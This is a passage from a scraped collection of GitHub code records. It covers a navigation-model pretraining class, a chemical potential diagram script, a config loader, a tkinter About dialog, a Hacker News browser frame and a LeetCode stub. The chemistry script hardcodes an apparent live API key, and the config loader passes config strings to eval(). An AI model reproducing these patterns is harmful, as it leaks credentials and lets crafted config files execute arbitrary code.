batch['traj_vpids'],batch['traj_cand_vpids'],\n batch['gmap_lens'], batch['gmap_step_ids'],batch['gmap_pos_fts'],\n batch['gmap_pair_dists'],batch['gmap_vpids'],batch['vp_pos_fts'],\n batch['gmap_visited_masks'],batch['global_act_labels'], batch['local_act_labels'],\n batch['ins2img_feat'], batch['current_vpid_index'],compute_loss,\n )\n else:\n raise ValueError('invalid task')\n\n def forward_mlm(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n txt_labels, compute_loss\n ):\n txt_embeds = self.bert.forward_mlm(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n )\n\n # only compute masked tokens for better efficiency\n masked_output = self._compute_masked_hidden(txt_embeds, txt_labels != -1)\n prediction_scores = self.mlm_head(masked_output)\n\n if compute_loss:\n mask_loss = F.cross_entropy(\n prediction_scores, txt_labels[txt_labels != -1], reduction='none'\n )\n return mask_loss\n else:\n return prediction_scores\n\n def _compute_masked_hidden(self, hidden, mask):\n '''get only the masked region (don't compute unnecessary hiddens)'''\n \n mask = mask.unsqueeze(-1).expand_as(hidden)\n hidden_masked = hidden[mask].contiguous().view(-1, hidden.size(-1))\n\n return hidden_masked\n\n def forward_mrc(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n vp_view_mrc_masks, vp_view_probs, vp_obj_mrc_masks, vp_obj_probs, compute_loss=True\n ):\n _, vp_embeds = self.bert(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n return_gmap_embeds=False\n )\n \n # view point leng at the last position\n vp_view_lens = [x[-1] for x in torch.split(traj_vp_view_lens, traj_step_lens)]\n vp_view_embeds = pad_tensors_wgrad(\n [x[1:view_len+1] for x, view_len in zip(vp_embeds, vp_view_lens)]\n ) # [stop] at 0\n \n \n # only compute masked regions for better efficient=cy\n view_masked_output = self._compute_masked_hidden(vp_view_embeds, vp_view_mrc_masks)\n \n view_prediction_soft_labels = self.image_classifier(view_masked_output)\n view_mrc_targets = self._compute_masked_hidden(vp_view_probs, vp_view_mrc_masks)\n\n if traj_obj_img_fts is not None:\n vp_obj_lens = [x[-1] for x in torch.split(traj_vp_obj_lens, traj_step_lens)]\n vp_obj_embeds = pad_tensors_wgrad(\n [x[view_len+1:view_len+obj_len+1] for x, view_len, obj_len in zip(vp_embeds, vp_view_lens, vp_obj_lens)]\n )\n # vp_obj_mrc_masks = vp_obj_mrc_masks[:, :vp_obj_embeds.size(1)]\n obj_masked_output = self._compute_masked_hidden(vp_obj_embeds, vp_obj_mrc_masks)\n if self.obj_classifier is None:\n obj_prediction_soft_labels = self.image_classifier(obj_masked_output)\n else:\n obj_prediction_soft_labels = self.obj_classifier(obj_masked_output)\n obj_mrc_targets = self._compute_masked_hidden(vp_obj_probs, vp_obj_mrc_masks)\n else:\n obj_prediction_soft_labels, obj_mrc_targets = None, None\n\n if compute_loss:\n view_prediction_soft_labels = F.log_softmax(view_prediction_soft_labels, dim=-1)\n view_mrc_loss = F.kl_div(view_prediction_soft_labels, view_mrc_targets, reduction='none').sum(dim=1)\n if obj_prediction_soft_labels is None:\n mrc_loss = view_mrc_loss\n else:\n obj_prediction_soft_labels = F.log_softmax(obj_prediction_soft_labels, dim=-1)\n obj_mrc_loss = F.kl_div(obj_prediction_soft_labels, obj_mrc_targets, reduction='none').sum(dim=1)\n mrc_loss = torch.cat([view_mrc_loss, obj_mrc_loss], 0)\n return mrc_loss\n else:\n return view_prediction_soft_labels, view_mrc_targets, obj_prediction_soft_labels, obj_mrc_targets\n\n def forward_sap(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n gmap_visited_masks, global_act_labels, local_act_labels, compute_loss\n ):\n batch_size = txt_ids.size(0)\n\n gmap_embeds, vp_embeds = self.bert(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n )\n \n if self.sap_fuse_linear is None:\n fuse_weights = 0.5\n else:\n fuse_weights = torch.sigmoid(self.sap_fuse_linear(\n torch.cat([gmap_embeds[:, 0], vp_embeds[:, 0]], 1)\n ))\n\n global_logits = self.global_sap_head(gmap_embeds).squeeze(2) * fuse_weights\n global_logits.masked_fill_(gmap_visited_masks, -float('inf'))\n global_logits.masked_fill_(gen_seq_masks(gmap_lens).logical_not(), -float('inf'))\n\n local_logits = self.local_sap_head(vp_embeds).squeeze(2) * (1 - fuse_weights)\n vp_nav_masks = pad_tensors_wgrad(\n [x[-1]!=1 for x in torch.split(traj_nav_types, traj_step_lens)]\n )[:, :local_logits.size(1)-1]\n vp_nav_masks = torch.cat(\n [torch.zeros(len(vp_nav_masks), 1).bool().to(vp_nav_masks.device), vp_nav_masks], 1\n ) # add [stop]\n local_logits.masked_fill_(vp_nav_masks, -float('inf'))\n\n # fusion\n fused_logits = torch.clone(global_logits)\n fused_logits[:, 0] += local_logits[:, 0] # stop\n for i in range(batch_size):\n visited_nodes = set([vp for vp, mask in zip(gmap_vpids[i], gmap_visited_masks[i]) if mask])\n tmp = {}\n bw_logits = 0\n for j, cand_vpid in enumerate(traj_cand_vpids[i][-1]):\n if cand_vpid in visited_nodes:\n bw_logits += local_logits[i, j+1]\n else:\n tmp[cand_vpid] = local_logits[i, j+1]\n for j, vp in enumerate(gmap_vpids[i]):\n if j > 0 and vp not in visited_nodes:\n if vp in tmp:\n fused_logits[i, j] += tmp[vp]\n else:\n fused_logits[i, j] += bw_logits\n\n if compute_loss:\n global_losses = F.cross_entropy(global_logits, global_act_labels, reduction='none')\n local_losses = F.cross_entropy(local_logits, local_act_labels, reduction='none')\n fused_losses = F.cross_entropy(fused_logits, global_act_labels, reduction='none')\n losses = global_losses + local_losses + fused_losses\n return losses\n else:\n return global_logits, local_logits, fused_logits, global_act_labels, local_act_labels\n\n def forward_og(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n obj_labels, compute_loss\n ):\n gmap_embeds, vp_embeds = self.bert.forward(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n return_gmap_embeds=False\n )\n\n vp_view_lens = [x[-1] for x in torch.split(traj_vp_view_lens, traj_step_lens, 0)]\n vp_obj_lens = [x[-1] for x in torch.split(traj_vp_obj_lens, traj_step_lens, 0)]\n obj_embeds = pad_tensors_wgrad([\n x[1+view_len: 1+view_len+obj_len] for x, view_len, obj_len in zip(vp_embeds, vp_view_lens, vp_obj_lens)\n ])\n obj_masks = gen_seq_masks(torch.stack(vp_obj_lens, 0))\n\n obj_logits = self.og_head(obj_embeds).squeeze(2)\n obj_logits.masked_fill_(obj_masks.logical_not(), -float('inf'))\n\n if compute_loss:\n losses = F.cross_entropy(obj_logits, obj_labels, reduction='none')\n return losses\n else:\n return obj_logits\n \n def forward_rt(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, gmap_rt_labels, vp_pos_fts,\n gmap_vpids_mask, compute_loss=True):\n \n gmap_embeds, _ = self.bert.forward(txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n gmap_vpids_mask, return_gmap_embeds=True, rt_task=True)\n \n mask_out = self._compute_masked_hidden(gmap_embeds[:,1:], gmap_rt_labels != -1)\n rt_logits = self.rt_head(mask_out)\n \n if compute_loss:\n rt_loss = F.cross_entropy(\n rt_logits, gmap_rt_labels[gmap_rt_labels != -1], reduction='none')\n return rt_loss\n else:\n return rt_logits\n \n def forward_dsap(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types,\n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n gmap_visited_masks, global_act_labels, local_act_labels, ins2img, current_vpid_index,\n compute_loss \n ): \n\n batch_size = txt_ids.size(0)\n\n gmap_embeds, vp_embeds = self.bert(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n )\n # need to define\n _, dist_logits, fuse_weight2 = self.node_dis_reg_head(gmap_embeds, ins2img)\n \n gmap_masks = gen_seq_masks(gmap_lens)\n fuse_weights = torch.sigmoid(self.sap_fuse_linear(\n torch.cat([gmap_embeds[:, 0], vp_embeds[:, 0]], 1)\n ))\n\n if self.config.const_fuse_gl:\n fuse_weights = self.config.const_fuse_gl_weight\n \n global_logits = self.global_sap_head(gmap_embeds).squeeze(2) * fuse_weights\n current_vpid_index = current_vpid_index.cpu().numpy()\n if self.config.switch_first_gd:\n global_logits[:,0] = global_logits[np.arange(len(current_vpid_index)), np.array(current_vpid_index)]\n global_logits.masked_fill_(gmap_visited_masks, -float('inf'))\n global_logits.masked_fill_(gmap_masks.logical_not(), -float('inf'))\n \n\n local_logits = self.local_sap_head(vp_embeds).squeeze(2) * (1 - fuse_weights)\n vp_nav_masks = pad_tensors_wgrad(\n [x[-1]!=1 for x in torch.split(traj_nav_types, traj_step_lens)]\n )[:, :local_logits.size(1)-1]\n vp_nav_masks = torch.cat(\n [torch.zeros(len(vp_nav_masks), 1).bool().to(vp_nav_masks.device), vp_nav_masks], 1\n ) # add [stop]\n local_logits.masked_fill_(vp_nav_masks, -float('inf'))\n \n fused_logits2 = self.global_distsap_head(gmap_embeds).squeeze(2)\n if self.config.switch_first_gd:\n dist_logits[:,0] = dist_logits[np.arange(len(current_vpid_index)), np.array(current_vpid_index)]\n fused_logits2[:,0] = fused_logits2[np.arange(len(current_vpid_index)), np.array(current_vpid_index)]\n fused_logits2 = dist_logits * (1-fuse_weight2) + fused_logits2 * fuse_weight2\n fused_logits2.masked_fill_(gmap_visited_masks, -float('inf'))\n fused_logits2.masked_fill_(gmap_masks.logical_not(), -float('inf')) \n\n dist_logits_copy = torch.clone(dist_logits)\n dist_logits_copy.masked_fill_(gmap_visited_masks, -float('inf'))\n dist_logits_copy.masked_fill_(gmap_masks.logical_not(), -float('inf')) \n\n # fusion\n fused_logits = torch.clone(global_logits)\n fused_logits[:, 0] += local_logits[:, 0] # stop\n for i in range(batch_size):\n visited_nodes = set([vp for vp, mask in zip(gmap_vpids[i], gmap_visited_masks[i]) if mask])\n tmp = {}\n bw_logits = 0\n n_accum = 0\n for j, cand_vpid in enumerate(traj_cand_vpids[i][-1]):\n if cand_vpid in visited_nodes:\n bw_logits += local_logits[i, j+1]\n n_accum += 1\n else:\n tmp[cand_vpid] = local_logits[i, j+1]\n\n for j, vp in enumerate(gmap_vpids[i]):\n if j > 0 and vp not in visited_nodes:\n if vp in tmp:\n fused_logits[i, j] += tmp[vp]\n else:\n if n_accum != 0 and self.config.avg_local_emb:\n fused_logits[i, j] += bw_logits/n_accum\n else:\n fused_logits[i, j] += bw_logits\n\n # fuse dist\n fused_logits += fused_logits2\n\n if compute_loss:\n dist_losses = F.cross_entropy(dist_logits_copy, global_act_labels, reduction='none')\n global_losses = F.cross_entropy(global_logits, global_act_labels, reduction='none')\n local_losses = F.cross_entropy(local_logits, local_act_labels, reduction='none')\n fused_losses = F.cross_entropy(fused_logits, global_act_labels, reduction='none')\n losses = global_losses + local_losses + fused_losses + dist_losses\n return losses\n else:\n return dist_logits_copy, global_logits, local_logits, fused_logits, global_act_labels, local_act_labels\n \n \n\n \n","repo_name":"zehao-wang/LAD","sub_path":"warmup_src/model/pretrain_cmt.py","file_name":"pretrain_cmt.py","file_ext":"py","file_size_in_byte":27173,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"43680473257","text":"# -*- coding: UTF-8 -*-\n\nfrom chemicalDiagram.ChemicalPotentialDiagram import ChemPotEntry, ChemPotDiagram,ChemPotPlotter,trans_PD_to_ChemPot_entries\nfrom chemicalDiagram.EquilibriumLine import EquilLine\nfrom pymatgen.core.composition import Composition\nfrom pymatgen.analysis.phase_diagram import PhaseDiagram\nfrom myResearch.getOrigStableEntriesList import getEntriesList,getOrigStableEntriesList\nfrom pymatgen.ext.matproj import MPRester\nimport json\nimport os\nimport imageio\nimport numpy as np\nfrom adjustText import adjust_text\nimport matplotlib.pyplot as plt\nMPR = MPRester(\"SZXJWLvi8njBGvA4sT\")\ncurrent_dir = os.path.join(os.path.dirname(__file__))\ndef get_ON_entries():\n ## Many queries are very large, so this python \n # method either queries the MP and saves it in the 'cache' file, \n # or if the cache file exists, it loads it directly from the cache. \n \n cache = os.path.join(current_dir, 'ternary_N_O_without_nitrates_stable')\n if os.path.exists(cache):\n print(\"Loading from cache.\")\n with open(cache, 'r') as f:\n return json.load(f)\n else:\n print(\"Reading from db.\")\n# from pymatgen.ext.matproj import MPRester\n \n criteria = {'elements':{'$all': [\"O\",\"N\"]}, 'nelements':3, 'e_above_hull':{'$lte':0.00}}\n # The criteria uses mongodb query language. See here for more details: https://docs.mongodb.com/manual/reference/operator/query/\n \n props = [\"material_id\",'pretty_formula','e_above_hull','structure',\"warnings\",\"formation_energy_per_atom\"]\n #The properties and the criteria use MaterialsProject features \n #You can see what is queryable from the MP API documentation: https://github.com/materialsproject/mapidoc/tree/master/materials \n \n entries = MPR.query(criteria=criteria, properties=props)\n print(len(entries))\n #Save files are prepared in a 'JSON' file. \n #Some MP objects are not JSONable, and so they must be turned into a dictionary before they can be saved. \n new_entries=[]\n for e in entries:\n X=e\n X['structure']=X['structure'].as_dict()\n new_entries.append(X)\n \n \n with open(cache, 'w') as f:\n json.dump(new_entries, f)\n return entries\n \n\nternary_O_N = get_ON_entries()\n\n\n\nprojEle = [\"O\",\"N\"]\nnewformeN = 2\nnewformeO = 2\nfig = None\n\nprint(len(ternary_O_N))\n\nformulas = [ee[\"pretty_formula\"] for ee in ternary_O_N]\nformulas = list(dict.fromkeys(formulas))\n'''set colordict'''\njet= plt.get_cmap('gist_rainbow')\nn=len(formulas)\ncolor=iter(jet(np.linspace(0,1,n)))\ncolordict = {}\nfor e in formulas:\n c = next(color)\n colordict[e] = c\nprint(len(formulas))\n\nimport random\n\n# random.shuffle(formulas)\nm=0\ntexts = []\nfilenames = []\naalist=[]\n\nfor ee in formulas:\n phi_dict = {}\n m+=1\n if ee != \"TaNO\":\n continue\n\n elsList = [str(el) for el in Composition(ee).elements]\n for el in elsList:\n if el != \"O\" and el != \"N\":\n tael = el\n elsList = [tael, \"O\",\"N\"]\n PDentries = getEntriesList(elsList)\n\n for e in PhaseDiagram(PDentries).stable_entries:\n if e.name == \"N2\":\n entry = PhaseDiagram(PDentries).make_entry_from_formEperatom(e.composition, newformeN)\n if e.name == \"O2\":\n entryO = PhaseDiagram(PDentries).make_entry_from_formEperatom(e.composition, newformeO)\n limits = [[-10,0],[-10,newformeO],[-10,newformeN]]\n CPentries = trans_PD_to_ChemPot_entries(PDentries,elsList)\n \n newentries = []\n for e in CPentries:\n if e.name != \"N2\" and e.name != \"O2\":\n newentries.append(e)\n newentries.append(ChemPotEntry(entry,newformeN,elsList))\n newentries.append(ChemPotEntry(entryO,newformeO,elsList))\n eql = EquilLine(newentries,elsList,limits = limits)\n\n for entry in eql._stable_domain_vertices:\n if entry.name == ee:\n center = np.average(eql._stable_domain_vertices[entry], axis=0)\n for entry in eql._stable_domain_vertices:\n phi = entry.form_E\n# print(entry.name,phi)\n for ind in range(len(elsList)):\n phi -= center[ind]*entry.ncomp[elsList[ind]]\n# print(center[ind],entry.ncomp[elsList[ind]])\n# print(phi)\n phi_dict[entry]=phi\n print()\n print(m, ee)\n phi_dict = {k: v for k, v in sorted(phi_dict.items(), key=lambda item: item[1])}\n for e in phi_dict:\n print(e.name, phi_dict[e])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dd-debug/examples_chemical_potential_diagrams","sub_path":"save_chem_ON2.py","file_name":"save_chem_ON2.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6633513580","text":"\"\"\"\r\nCopyright 2021 Daniel Afriyie\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n https://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\nimport abc\r\nimport json\r\nimport typing\r\nimport threading\r\n\r\nfrom ru.utils import get_data\r\nfrom ru.constants import constants\r\nfrom ru.hints import Cast, Path, Config, OpenPath\r\nfrom ru.exceptions.exceptions import ConfigKeyError, ConfigFileNotFoundError\r\n\r\n\r\nclass BaseConfig(abc.ABC):\r\n \"\"\"\"\r\n Base config class for all config classes\r\n \"\"\"\r\n\r\n def __init__(self, config_path: Path) -> None:\r\n self.CONFIG_PATH = config_path\r\n self._config: Config = self.load()\r\n self._mutex: threading.RLock = threading.RLock()\r\n\r\n @property\r\n def config(self) -> Config:\r\n return self._config\r\n\r\n @abc.abstractmethod\r\n def save(self, filename: OpenPath = \"config.txt\", encoding: typing.Optional[str] = constants.ENCODING) -> None:\r\n pass\r\n\r\n @abc.abstractmethod\r\n def load_config(self) -> Config:\r\n pass\r\n\r\n @staticmethod\r\n def _cast(item: str, cast: Cast) -> typing.Any:\r\n if cast is bool:\r\n return eval(item.strip().capitalize())\r\n if cast is not None:\r\n return cast(item.strip())\r\n return item\r\n\r\n def get(self, item: str, default: typing.Optional[typing.Any] = None, cast: Cast = None) -> typing.Any:\r\n with self._mutex:\r\n try:\r\n val = self._config[item]\r\n if cast:\r\n return self._cast(val, cast)\r\n return val\r\n except KeyError:\r\n return default\r\n\r\n def get_as_tupple(self, item: str, cast: Cast = None) -> typing.Tuple[typing.Any, ...]:\r\n with self._mutex:\r\n items: list = self._config[item].split(\",\")\r\n if cast is None:\r\n return tuple(items)\r\n return tuple(self._cast(val, cast) for val in items)\r\n\r\n def load(self) -> Config:\r\n try:\r\n return self.load_config()\r\n except FileNotFoundError:\r\n raise ConfigFileNotFoundError(f\"{self.__class__.__name__}: Config file '{self.CONFIG_PATH}' not found!\")\r\n\r\n def __getitem__(self, item: typing.Union[list, str]) -> typing.Any:\r\n with self._mutex:\r\n try:\r\n if isinstance(item, list):\r\n items: list = [self._config[key] for key in item]\r\n return items\r\n else:\r\n return self._config[item]\r\n except KeyError:\r\n raise ConfigKeyError(f\"{item}\")\r\n\r\n def __setitem__(self, key: str, value: str) -> None:\r\n with self._mutex:\r\n self._config[key] = value\r\n\r\n def __repr__(self) -> str:\r\n return str(self._config)\r\n\r\n\r\nclass JsonConfig(BaseConfig):\r\n\r\n def __init__(self, config_path: Path = \"config.json\") -> None:\r\n super().__init__(config_path)\r\n\r\n def load_config(self) -> Config:\r\n with open(self.CONFIG_PATH, encoding=constants.ENCODING) as f:\r\n config: Config = json.load(f)\r\n return config\r\n\r\n def save(self, filename: OpenPath = \"config.txt\", encoding: typing.Optional[str] = constants.ENCODING) -> None:\r\n with open(filename, \"w\", encoding=encoding) as f:\r\n json.dump(self._config, f, indent=4)\r\n\r\n\r\nclass TextConfig(BaseConfig):\r\n\r\n def __init__(self, config_path: Path = \"config.txt\") -> None:\r\n super().__init__(config_path)\r\n\r\n def load_config(self) -> Config:\r\n config: dict = {}\r\n data = get_data(self.CONFIG_PATH, split=True, split_char=\"\\n\", filter_blanks=True)\r\n for d in data:\r\n try:\r\n split = d.split(\"=\")\r\n key = split.pop(0)\r\n val = \"=\".join(split)\r\n config[key] = val\r\n except ValueError:\r\n pass\r\n return config\r\n\r\n def save(self, filename: OpenPath = \"config.txt\", encoding: typing.Optional[str] = constants.ENCODING) -> None:\r\n with open(filename, \"w\", encoding=encoding) as f:\r\n len_config: int = len(self._config) - 1\r\n for idx, key in enumerate(self._config):\r\n f.write(f\"{key}={self._config[key]}\")\r\n if idx < len_config:\r\n f.write(\"\\n\")\r\n","repo_name":"danielafriyie/raccy-utils","sub_path":"python/ru/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74936901811","text":"import webbrowser\nfrom tkinter import ttk, Toplevel\n\nfrom dialogs import helper\nfrom report.translation import Translation\n\n\nclass DlgAbout(Toplevel):\n\n def __init__(self, app_version, script_version):\n Toplevel.__init__(self)\n self.title(Translation.get_name('about'))\n self.iconbitmap(\"\")\n\n width = 400\n height = 160\n\n self.geometry(helper.get_center_coords(self, width, height))\n\n self.app_name = \"AssetClassification\"\n self.app_version = f\"App.-Vers.: {app_version}\"\n self.script_version = f\"Script-Vers.: {script_version}\"\n self.app_url = \"https://github.com/gus484/AssetClassification\"\n self.init_page()\n\n def init_page(self):\n ttk.Label(self, text=self.app_name).pack()\n ttk.Label(self, text=self.app_version).pack()\n ttk.Label(self, text=self.script_version).pack()\n ttk.Label(self, text=self.app_url).pack()\n\n link = ttk.Label(self, text=\"Images:\")\n link.pack()\n\n link1 = ttk.Label(self, text=\"Loschen Icons erstellt von Pixel perfect - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link1.pack()\n link1.bind(\"\", lambda e: self.callback(\"https://www.flaticon.com/de/kostenlose-icons/loschen\"))\n\n link2 = ttk.Label(self, text=\"Plus Icons erstellt von Pixel perfect - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link2.pack()\n link2.bind(\"\", lambda e: self.callback(\"ttps://www.flaticon.com/de/kostenlose-icons/plus\"))\n\n link3 = ttk.Label(self, text=\"Datei Icons erstellt von DinosoftLabs - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link3.pack()\n link3.bind(\"\", lambda e: self.callback(\"https://www.flaticon.com/de/kostenlose-icons/datei\"))\n\n link4 = ttk.Label(self, text=\"Graph Icons erstellt von Freepik - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link4.pack()\n link4.bind(\"\", lambda e: self.callback(\"https://www.flaticon.com/de/kostenlose-icons/graph\"))\n\n def callback(self, url):\n webbrowser.open_new(url)\n\n\nif __name__ == \"__main__\":\n app_about_dlg = DlgAbout()\n app_about_dlg.mainloop()\n","repo_name":"gus484/AssetClassification","sub_path":"dialogs/dlgAbout.py","file_name":"dlgAbout.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18288005837","text":"import urwid, re, time, collections, requests\nfrom customer_types import STICKIES\nfrom frames.abstract_frame import AbstractFrame\nimport time\n\nimport logging\nlog = logging.getLogger(__name__)\n\nclass StoryFrame(AbstractFrame):\n def __init__(self, story, page, urwidViewManager, uFilter=None):\n super().__init__(urwidViewManager, uFilter)\n self.story = story\n self.page = page\n\n storyDict = {\n 'top': 'front_page',\n 'new': 'story',\n 'ask': 'ask_hn',\n 'show': 'show_hn',\n 'jobs' : 'job'\n }\n\n # 'search' will search by relevancy and score\n # this only works well w this api for front page posts\n # using 'search' for say, 'job' will return posts from too long ago\n search = 'search' if self.story == 'top' else 'search_by_date'\n self.url = f'https://hn.algolia.com/api/v1/{search}?tags=' + storyDict[self.story] + f'&page={self.page}'\n\n self.headers = {\n 'user-agent': 'hackernews-TerminusBrowse'\n }\n self.info_text = 'Score: {} Comments: {}'\n\n self.load()\n self.headerString = f'TerminusBrowse: {self.story}'\n\n # Overrides super\n def loader(self):\n self.titles = self.getJSONCatalog(self.url)\n self.contents = urwid.Pile(self.buildFrame(self.story))\n\n def buildFrame(self, board):\n '''returns the board widget'''\n\n threadButtonList = []\n\n for title, threadInfo in self.titles.items():\n if title == 'Next':\n if not self.uFilter:\n subButton = urwid.Button(str(threadInfo[0]), self.changeStoryPage)\n threadButtonList.append(urwid.LineBox(urwid.Pile([subButton, urwid.Divider('-'), urwid.Text(threadInfo[1])])))\n continue\n if self.uFilter:\n if re.search(self.uFilter.lower(), title.lower()):\n threadButton = urwid.Button(str(threadInfo[0]), self.changeFrameThread)\n threadInfo = urwid.Text(self.info_text.format(str(threadInfo[1]),str(threadInfo[2])))\n threadList = [threadButton, urwid.Divider('-'), urwid.Divider(), urwid.Text(title), urwid.Divider(), urwid.Divider('-'), threadInfo]\n threadButtonList.append(urwid.LineBox(urwid.Pile(threadList)))\n else:\n threadButton = urwid.Button(str(threadInfo[0]), self.changeFrameThread)\n threadInfo = urwid.Text(self.info_text.format(str(threadInfo[1]), str(threadInfo[2])))\n threadList = [threadButton, urwid.Divider('-'), urwid.Divider(), urwid.Text(title), urwid.Divider(), urwid.Divider('-'), threadInfo]\n threadButtonList.append(urwid.LineBox(urwid.Pile(threadList)))\n\n self.parsedItems = len(threadButtonList)\n catalogueButtons = urwid.GridFlow(threadButtonList, 30, 2, 2, 'center')\n listbox = urwid.ListBox(urwid.SimpleListWalker([catalogueButtons]))\n\n self.uvm.itemCount = len(threadButtonList)\n return [listbox]\n\n def getJSONCatalog(self, url):\n response = requests.get(url, headers=self.headers)\n\n data = response.json()\n\n return self.parseStoryBoard(data)\n\n def parseStoryBoard(self, data):\n titles = collections.OrderedDict()\n\n for i in range(len(data['hits'])):\n titles[data['hits'][i]['title']] = (data['hits'][i]['objectID'],\n data['hits'][i]['points'],\n data['hits'][i]['num_comments'])\n\n if int(self.page) < data['nbPages'] - 1:\n titles['Next'] = (int(self.page) + 1,\n 'Next',\n '')\n\n return titles\n\n def changeFrameThread(self, button):\n from command_handler_class import CommandHandler\n ch = CommandHandler(self.uvm)\n ch.routeCommand('hnp ' + self.story + ' ' + button.get_label())\n\n def changeStoryPage(self, button):\n from command_handler_class import CommandHandler\n ch = CommandHandler(self.uvm)\n ch.routeCommand('story ' + self.story + ' ' + button.get_label())\n","repo_name":"wtheisen/TerminusBrowser","sub_path":"src/frames/hackernews/story_frame.py","file_name":"story_frame.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"} +{"seq_id":"70182691572","text":"#\n# @lc app=leetcode.cn id=2441 lang=python3\n#\n# [2441] 与对应负数同时存在的最大正整数\n#\n# https://leetcode.cn/problems/largest-positive-integer-that-exists-with-its-negative/description/\n#\n# algorithms\n# Easy (72.91%)\n# Likes: 31\n# Dislikes: 0\n# Total Accepted: 22.3K\n# Total Submissions: 30.6K\n# Testcase Example: '[-1,2,-3,3]'\n#\n# 给你一个 不包含 任何零的整数数组 nums ,找出自身与对应的负数都在数组中存在的最大正整数 k 。\n# \n# 返回正整数 k ,如果不存在这样的整数,返回 -1 。\n# \n# \n# \n# 示例 1:\n# \n# \n# 输入:nums = [-1,2,-3,3]\n# 输出:3\n# 解释:3 是数组中唯一一个满足题目要求的 k 。\n# \n# \n# 示例 2:\n# \n# \n# 输入:nums = [-1,10,6,7,-7,1]\n# 输出:7\n# 解释:数组中存在 1 和 7 对应的负数,7 的值更大。\n# \n# \n# 示例 3:\n# \n# \n# 输入:nums = [-10,8,6,7,-2,-3]\n# 输出:-1\n# 